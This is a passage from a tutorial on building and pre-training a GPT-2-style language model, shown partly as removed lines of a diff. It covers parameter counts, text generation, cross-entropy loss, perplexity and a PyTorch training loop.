    total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
    ```

  - **Output Projection (`out_proj`):**

    ```python
    out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
    ```

  - **Total Multi-Head Attention Parameters:**

    ```python
    mha_params = total_qkv_params + out_proj_params
    mha_params = 1,769,472 + 590,592 = 2,360,064
    ```

**b. FeedForward Network**

- **Components:**
  - **First Linear Layer:** `nn.Linear(emb_dim, 4 * emb_dim)`
  - **Second Linear Layer:** `nn.Linear(4 * emb_dim, emb_dim)`
- **Calculations:**

  - **First Linear Layer:**

    ```python
    ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
    ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
    ```

  - **Second Linear Layer:**

    ```python
    ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
    ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
    ```

  - **Total FeedForward Parameters:**

    ```python
    ff_params = ff_first_layer_params + ff_second_layer_params
    ff_params = 2,362,368 + 2,360,064 = 4,722,432
    ```

**c. Layer Normalizations**

- **Components:**
  - Two `LayerNorm` instances per block.
  - Each `LayerNorm` has `2 * emb_dim` parameters (scale and shift).
- **Calculations:**

  ```python
  layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 2 * 768 = 3,072
  ```

**d. Total Parameters per Transformer Block**
```python
params_per_block = mha_params + ff_params + layer_norm_params_per_block
params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
```
**Total Parameters for All Transformer Blocks**
```python
total_transformer_blocks_params = params_per_block * n_layers
total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
```
#### **3. Final Layers**

**a. Final Layer Normalization**

- **Parameters:** `2 * emb_dim` (scale and shift)
```python
final_layer_norm_params = 2 * 768 = 1,536
```
**b. Output Projection Layer (`out_head`)**

- **Layer:** `nn.Linear(emb_dim, vocab_size, bias=False)`
- **Parameters:** `emb_dim * vocab_size`
```python
output_projection_params = 768 * 50257 = 38,597,376
```
#### **4. Summing Up All the Parameters**
```python
total_params = (
    embedding_params +
    total_transformer_blocks_params +
    final_layer_norm_params +
    output_projection_params
)
total_params = (
    39,383,808 +
    85,026,816 +
    1,536 +
    38,597,376
)
total_params = 163,009,536
```
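
Note that 163M is larger than the 124M usually quoted for GPT-2 small because the original GPT-2 ties the output projection weights to the token embedding matrix (weight tying), so those 38,597,376 parameters are only counted once. A quick sketch (reusing the `model` and `total_params` from above; the tying line is a hypothetical tweak, not part of the code on this page):

```python
# Subtract the untied output head to recover the usual 124M figure
total_params_gpt2 = total_params - sum(p.numel() for p in model.out_head.parameters())
print(f"Parameters with weight tying: {total_params_gpt2:,}")
# Parameters with weight tying: 124,412,160

# One way to actually tie the weights would be:
# model.out_head.weight = model.tok_emb.weight
```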

## Generating Text

To have a model that predicts the next token like the previous one, we just need to take the last token values from the output (since they will be the values of the predicted token), which will be one **value per entry in the vocabulary**, then use the `softmax` function to normalize the dimensions into probabilities that sum to 1, and then get the index of the largest entry, which will be the index of the word within the vocabulary.

Code from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
```python
def generate_text_simple(model, idx, max_new_tokens, context_size):
    # idx is (batch, n_tokens) array of indices in the current context
    for _ in range(max_new_tokens):

        # Crop current context if it exceeds the supported context size
        # E.g., if LLM supports only 5 tokens, and the context size is 10
        # then only the last 5 tokens are used as context
        idx_cond = idx[:, -context_size:]

        # Get the predictions
        with torch.no_grad():
            logits = model(idx_cond)

        # Focus only on the last time step
        # (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
        logits = logits[:, -1, :]

        # Apply softmax to get probabilities
        probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)

        # Get the idx of the vocab entry with the highest probability value
        idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)

        # Append sampled index to the running sequence
        idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)

    return idx


start_context = "Hello, I am"

# `tokenizer` is the GPT-2 BPE tokenizer used throughout these examples
tokenizer = tiktoken.get_encoding("gpt2")
encoded = tokenizer.encode(start_context)
print("encoded:", encoded)

encoded_tensor = torch.tensor(encoded).unsqueeze(0)
print("encoded_tensor.shape:", encoded_tensor.shape)

model.eval() # disable dropout

out = generate_text_simple(
    model=model,
    idx=encoded_tensor,
    max_new_tokens=6,
    context_size=GPT_CONFIG_124M["context_length"]
)

print("Output:", out)
print("Output length:", len(out[0]))
```
## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,970 +0,0 @@
# 6. Pre-training & Loading models

## Text Generation

In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.

As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.

> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.

## Text Evaluation

In order to perform correct training it's necessary to check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.

In order to maximize the probability of the correct token, the weights of the model must be modified so that this probability is maximised. The updates of the weights are done via **backpropagation**. This requires a **loss function to minimize**. In this case, the function will be based on the **difference between the performed prediction and the desired one**.

However, instead of working with the raw predictions, it will work with a logarithm. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens: the first 4 tokens are the last ones of the input and the fifth is the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 were in the input, the model doesn't know this) with 5 expected tokens and therefore 5 probabilities to maximize.

Therefore, after taking the natural logarithm of each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and that's the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:

<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>

Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
For example, a perplexity value of 48,725 means that, when it needs to predict a token, it's unsure about which among 48,725 tokens in the vocabulary is the right one.
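
A minimal sketch (my own illustration, not from the referenced notebook) of how cross entropy loss and perplexity relate for a single predicted token distribution:

```python
import torch
import torch.nn.functional as F

vocab_size = 50257
logits = torch.randn(1, vocab_size)        # model output for one position
target = torch.tensor([123])               # id of the expected token

# Cross entropy = -log(probability assigned to the correct token)
loss = F.cross_entropy(logits, target)
prob_of_target = torch.softmax(logits, dim=-1)[0, target]
print(loss, -torch.log(prob_of_target))    # same value

# Perplexity is just the exponential of the cross entropy loss
perplexity = torch.exp(loss)
print(perplexity)                          # large (on the order of the vocab size) for an untrained model
```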

## Pre-Train Example

This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb), sometimes slightly modified.

<details>

<summary>Previous code used here but already explained in previous sections</summary>

```python
"""
This is code explained before so it won't be explained again
"""

import tiktoken
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader


class GPTDatasetV1(Dataset):
    def __init__(self, txt, tokenizer, max_length, stride):
        self.input_ids = []
        self.target_ids = []

        # Tokenize the entire text
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})

        # Use a sliding window to chunk the book into overlapping sequences of max_length
        for i in range(0, len(token_ids) - max_length, stride):
            input_chunk = token_ids[i:i + max_length]
            target_chunk = token_ids[i + 1: i + max_length + 1]
            self.input_ids.append(torch.tensor(input_chunk))
            self.target_ids.append(torch.tensor(target_chunk))

    def __len__(self):
        return len(self.input_ids)

    def __getitem__(self, idx):
        return self.input_ids[idx], self.target_ids[idx]


def create_dataloader_v1(txt, batch_size=4, max_length=256,
                         stride=128, shuffle=True, drop_last=True, num_workers=0):
    # Initialize the tokenizer
    tokenizer = tiktoken.get_encoding("gpt2")

    # Create dataset
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)

    # Create dataloader
    dataloader = DataLoader(
        dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)

    return dataloader


class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert d_out % num_heads == 0, "d_out must be divisible by n_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))

    def forward(self, x):
        b, num_tokens, d_in = x.shape

        keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.reshape(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec) # optional projection

        return context_vec


class LayerNorm(nn.Module):
|
|
||||||
def __init__(self, emb_dim):
|
|
||||||
super().__init__()
|
|
||||||
self.eps = 1e-5
|
|
||||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
|
||||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
mean = x.mean(dim=-1, keepdim=True)
|
|
||||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
|
||||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
|
||||||
return self.scale * norm_x + self.shift
|
|
||||||
|
|
||||||
|
|
||||||
class GELU(nn.Module):
|
|
||||||
def __init__(self):
|
|
||||||
super().__init__()
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return 0.5 * x * (1 + torch.tanh(
|
|
||||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
|
||||||
(x + 0.044715 * torch.pow(x, 3))
|
|
||||||
))
|
|
||||||
|
|
||||||
|
|
||||||
class FeedForward(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.layers = nn.Sequential(
|
|
||||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
|
||||||
GELU(),
|
|
||||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return self.layers(x)
|
|
||||||
|
|
||||||
|
|
||||||
class TransformerBlock(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.att = MultiHeadAttention(
|
|
||||||
d_in=cfg["emb_dim"],
|
|
||||||
d_out=cfg["emb_dim"],
|
|
||||||
context_length=cfg["context_length"],
|
|
||||||
num_heads=cfg["n_heads"],
|
|
||||||
dropout=cfg["drop_rate"],
|
|
||||||
qkv_bias=cfg["qkv_bias"])
|
|
||||||
self.ff = FeedForward(cfg)
|
|
||||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
# Shortcut connection for attention block
|
|
||||||
shortcut = x
|
|
||||||
x = self.norm1(x)
|
|
||||||
x = self.att(x) # Shape [batch_size, num_tokens, emb_size]
|
|
||||||
x = self.drop_shortcut(x)
|
|
||||||
x = x + shortcut # Add the original input back
|
|
||||||
|
|
||||||
# Shortcut connection for feed-forward block
|
|
||||||
shortcut = x
|
|
||||||
x = self.norm2(x)
|
|
||||||
x = self.ff(x)
|
|
||||||
x = self.drop_shortcut(x)
|
|
||||||
x = x + shortcut # Add the original input back
|
|
||||||
|
|
||||||
return x
|
|
||||||
|
|
||||||
|
|
||||||
class GPTModel(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
|
||||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
|
||||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
self.trf_blocks = nn.Sequential(
|
|
||||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
|
|
||||||
|
|
||||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
|
|
||||||
|
|
||||||
def forward(self, in_idx):
|
|
||||||
batch_size, seq_len = in_idx.shape
|
|
||||||
tok_embeds = self.tok_emb(in_idx)
|
|
||||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
|
|
||||||
x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size]
|
|
||||||
x = self.drop_emb(x)
|
|
||||||
x = self.trf_blocks(x)
|
|
||||||
x = self.final_norm(x)
|
|
||||||
logits = self.out_head(x)
|
|
||||||
return logits
|
|
||||||
```
|
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Download contents to train the data with
|
|
||||||
import os
|
|
||||||
import urllib.request
|
|
||||||
|
|
||||||
file_path = "the-verdict.txt"
|
|
||||||
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"
|
|
||||||
|
|
||||||
if not os.path.exists(file_path):
|
|
||||||
with urllib.request.urlopen(url) as response:
|
|
||||||
text_data = response.read().decode('utf-8')
|
|
||||||
with open(file_path, "w", encoding="utf-8") as file:
|
|
||||||
file.write(text_data)
|
|
||||||
else:
|
|
||||||
with open(file_path, "r", encoding="utf-8") as file:
|
|
||||||
text_data = file.read()
|
|
||||||
|
|
||||||
total_characters = len(text_data)
|
|
||||||
tokenizer = tiktoken.get_encoding("gpt2")
|
|
||||||
total_tokens = len(tokenizer.encode(text_data))
|
|
||||||
|
|
||||||
print("Data downloaded")
|
|
||||||
print("Characters:", total_characters)
|
|
||||||
print("Tokens:", total_tokens)
|
|
||||||
|
|
||||||
# Model initialization
|
|
||||||
GPT_CONFIG_124M = {
|
|
||||||
"vocab_size": 50257, # Vocabulary size
|
|
||||||
"context_length": 256, # Shortened context length (orig: 1024)
|
|
||||||
"emb_dim": 768, # Embedding dimension
|
|
||||||
"n_heads": 12, # Number of attention heads
|
|
||||||
"n_layers": 12, # Number of layers
|
|
||||||
"drop_rate": 0.1, # Dropout rate
|
|
||||||
"qkv_bias": False # Query-key-value bias
|
|
||||||
}
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.eval()
|
|
||||||
print ("Model initialized")
|
|
||||||
|
|
||||||
|
|
||||||
# Functions to transform from text to token ids and from token ids back to text
|
|
||||||
def text_to_token_ids(text, tokenizer):
|
|
||||||
encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
|
|
||||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
|
|
||||||
return encoded_tensor
|
|
||||||
|
|
||||||
def token_ids_to_text(token_ids, tokenizer):
|
|
||||||
flat = token_ids.squeeze(0) # remove batch dimension
|
|
||||||
return tokenizer.decode(flat.tolist())
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Define loss functions
|
|
||||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
logits = model(input_batch)
|
|
||||||
loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
|
|
||||||
return loss
|
|
||||||
|
|
||||||
|
|
||||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
|
|
||||||
total_loss = 0.
|
|
||||||
if len(data_loader) == 0:
|
|
||||||
return float("nan")
|
|
||||||
elif num_batches is None:
|
|
||||||
num_batches = len(data_loader)
|
|
||||||
else:
|
|
||||||
# Reduce the number of batches to match the total number of batches in the data loader
|
|
||||||
# if num_batches exceeds the number of batches in the data loader
|
|
||||||
num_batches = min(num_batches, len(data_loader))
|
|
||||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
|
||||||
if i < num_batches:
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
total_loss += loss.item()
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return total_loss / num_batches
|
|
||||||
|
|
||||||
|
|
||||||
# Apply Train/validation ratio and create dataloaders
|
|
||||||
train_ratio = 0.90
|
|
||||||
split_idx = int(train_ratio * len(text_data))
|
|
||||||
train_data = text_data[:split_idx]
|
|
||||||
val_data = text_data[split_idx:]
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
train_loader = create_dataloader_v1(
|
|
||||||
train_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=True,
|
|
||||||
shuffle=True,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
|
|
||||||
val_loader = create_dataloader_v1(
|
|
||||||
val_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=False,
|
|
||||||
shuffle=False,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
# Sanity checks
|
|
||||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the training loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"increase the `training_ratio`")
|
|
||||||
|
|
||||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the validation loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"decrease the `training_ratio`")
|
|
||||||
|
|
||||||
print("Train loader:")
|
|
||||||
for x, y in train_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
print("\nValidation loader:")
|
|
||||||
for x, y in val_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
train_tokens = 0
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
train_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
val_tokens = 0
|
|
||||||
for input_batch, target_batch in val_loader:
|
|
||||||
val_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
print("Training tokens:", train_tokens)
|
|
||||||
print("Validation tokens:", val_tokens)
|
|
||||||
print("All tokens:", train_tokens + val_tokens)
|
|
||||||
|
|
||||||
|
|
||||||
# Indicate the device to use
|
|
||||||
if torch.cuda.is_available():
|
|
||||||
device = torch.device("cuda")
|
|
||||||
elif torch.backends.mps.is_available():
|
|
||||||
device = torch.device("mps")
|
|
||||||
else:
|
|
||||||
device = torch.device("cpu")
|
|
||||||
|
|
||||||
print(f"Using {device} device.")
|
|
||||||
|
|
||||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Pre-calculate losses without starting yet
|
|
||||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
|
|
||||||
|
|
||||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device)
|
|
||||||
|
|
||||||
print("Training loss:", train_loss)
|
|
||||||
print("Validation loss:", val_loss)
|
|
||||||
|
|
||||||
|
|
||||||
# Functions to train the model
|
|
||||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
|
|
||||||
eval_freq, eval_iter, start_context, tokenizer):
|
|
||||||
# Initialize lists to track losses and tokens seen
|
|
||||||
train_losses, val_losses, track_tokens_seen = [], [], []
|
|
||||||
tokens_seen, global_step = 0, -1
|
|
||||||
|
|
||||||
# Main training loop
|
|
||||||
for epoch in range(num_epochs):
|
|
||||||
model.train() # Set model to training mode
|
|
||||||
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
optimizer.zero_grad() # Reset loss gradients from previous batch iteration
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
loss.backward() # Calculate loss gradients
|
|
||||||
optimizer.step() # Update model weights using loss gradients
|
|
||||||
tokens_seen += input_batch.numel()
|
|
||||||
global_step += 1
|
|
||||||
|
|
||||||
# Optional evaluation step
|
|
||||||
if global_step % eval_freq == 0:
|
|
||||||
train_loss, val_loss = evaluate_model(
|
|
||||||
model, train_loader, val_loader, device, eval_iter)
|
|
||||||
train_losses.append(train_loss)
|
|
||||||
val_losses.append(val_loss)
|
|
||||||
track_tokens_seen.append(tokens_seen)
|
|
||||||
print(f"Ep {epoch+1} (Step {global_step:06d}): "
|
|
||||||
f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
|
|
||||||
|
|
||||||
# Print a sample text after each epoch
|
|
||||||
generate_and_print_sample(
|
|
||||||
model, tokenizer, device, start_context
|
|
||||||
)
|
|
||||||
|
|
||||||
return train_losses, val_losses, track_tokens_seen
|
|
||||||
|
|
||||||
|
|
||||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
|
|
||||||
model.eval()
|
|
||||||
with torch.no_grad():
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
|
|
||||||
model.train()
|
|
||||||
return train_loss, val_loss
|
|
||||||
|
|
||||||
|
|
||||||
def generate_and_print_sample(model, tokenizer, device, start_context):
|
|
||||||
model.eval()
|
|
||||||
context_size = model.pos_emb.weight.shape[0]
|
|
||||||
encoded = text_to_token_ids(start_context, tokenizer).to(device)
|
|
||||||
with torch.no_grad():
|
|
||||||
token_ids = generate_text(
|
|
||||||
model=model, idx=encoded,
|
|
||||||
max_new_tokens=50, context_size=context_size
|
|
||||||
)
|
|
||||||
decoded_text = token_ids_to_text(token_ids, tokenizer)
|
|
||||||
print(decoded_text.replace("\n", " ")) # Compact print format
|
|
||||||
model.train()
|
|
||||||
|
|
||||||
|
|
||||||
# Start training!
|
|
||||||
import time
|
|
||||||
start_time = time.time()
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.to(device)
|
|
||||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
|
|
||||||
|
|
||||||
num_epochs = 10
|
|
||||||
train_losses, val_losses, tokens_seen = train_model_simple(
|
|
||||||
model, train_loader, val_loader, optimizer, device,
|
|
||||||
num_epochs=num_epochs, eval_freq=5, eval_iter=5,
|
|
||||||
start_context="Every effort moves you", tokenizer=tokenizer
|
|
||||||
)
|
|
||||||
|
|
||||||
end_time = time.time()
|
|
||||||
execution_time_minutes = (end_time - start_time) / 60
|
|
||||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Show graphics with the training process
|
|
||||||
import matplotlib.pyplot as plt
|
|
||||||
from matplotlib.ticker import MaxNLocator
|
|
||||||
import math
|
|
||||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
|
|
||||||
fig, ax1 = plt.subplots(figsize=(5, 3))
|
|
||||||
ax1.plot(epochs_seen, train_losses, label="Training loss")
|
|
||||||
ax1.plot(
|
|
||||||
epochs_seen, val_losses, linestyle="-.", label="Validation loss"
|
|
||||||
)
|
|
||||||
ax1.set_xlabel("Epochs")
|
|
||||||
ax1.set_ylabel("Loss")
|
|
||||||
ax1.legend(loc="upper right")
|
|
||||||
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
|
|
||||||
ax2 = ax1.twiny()
|
|
||||||
ax2.plot(tokens_seen, train_losses, alpha=0)
|
|
||||||
ax2.set_xlabel("Tokens seen")
|
|
||||||
fig.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
# Compute perplexity from the loss values
|
|
||||||
train_ppls = [math.exp(loss) for loss in train_losses]
|
|
||||||
val_ppls = [math.exp(loss) for loss in val_losses]
|
|
||||||
# Plot perplexity over tokens seen
|
|
||||||
plt.figure()
|
|
||||||
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
|
|
||||||
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
|
|
||||||
plt.xlabel('Tokens Seen')
|
|
||||||
plt.ylabel('Perplexity')
|
|
||||||
plt.title('Perplexity over Training')
|
|
||||||
plt.legend()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
|
|
||||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
|
|
||||||
|
|
||||||
|
|
||||||
torch.save({
|
|
||||||
"model_state_dict": model.state_dict(),
|
|
||||||
"optimizer_state_dict": optimizer.state_dict(),
|
|
||||||
},
|
|
||||||
"/tmp/model_and_optimizer.pth"
|
|
||||||
)
|
|
||||||
```
|
|
||||||
|
|
||||||
Let's see an explanation step by step
|
|
||||||
|
|
||||||
### Functions to transform text <--> ids
|
|
||||||
|
|
||||||
These are some simple functions that can be used to transform texts into vocabulary token ids and back. This is needed at the beginning of the text handling and at the end of the predictions:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Functions to transform from text to token ids and from token ids back to text
|
|
||||||
def text_to_token_ids(text, tokenizer):
|
|
||||||
encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
|
|
||||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
|
|
||||||
return encoded_tensor
|
|
||||||
|
|
||||||
def token_ids_to_text(token_ids, tokenizer):
|
|
||||||
flat = token_ids.squeeze(0) # remove batch dimension
|
|
||||||
return tokenizer.decode(flat.tolist())
|
|
||||||
```
|
|
||||||
|
|
||||||
### Generate text functions
|
|
||||||
|
|
||||||
In a previous section a function was used that just picked the **most probable token** after getting the logits. However, this means that for each input the same output is always going to be generated, which makes it very deterministic.
|
|
||||||
|
|
||||||
The following `generate_text` function will apply the `top-k`, `temperature` and `multinomial` concepts.
|
|
||||||
|
|
||||||
- The **`top-k`** means that we will start reducing to `-inf` the logits of all the tokens except the top k tokens. So, if k=3, before making a decision only the 3 most probable tokens will have a probability different from `-inf`.
|
|
||||||
- The **`temperature`** means that every logit will be divided by the temperature value. A value of `0.1` will sharpen the distribution (boosting the highest probability relative to the lowest ones), while a temperature of `5`, for example, will flatten it. This helps to add the variation in responses we would like the LLM to have.
|
|
||||||
- After applying the temperature, a **`softmax`** function is applied again to make all the remaining tokens have a total probability of 1.
|
|
||||||
- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **sample the next token according to the final probabilities**. So if token 1 had a 70% probability, token 2 a 20% and token 3 a 10%, then 70% of the time token 1 will be selected, 20% of the time token 2 and 10% of the time token 3.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Generate text function
|
|
||||||
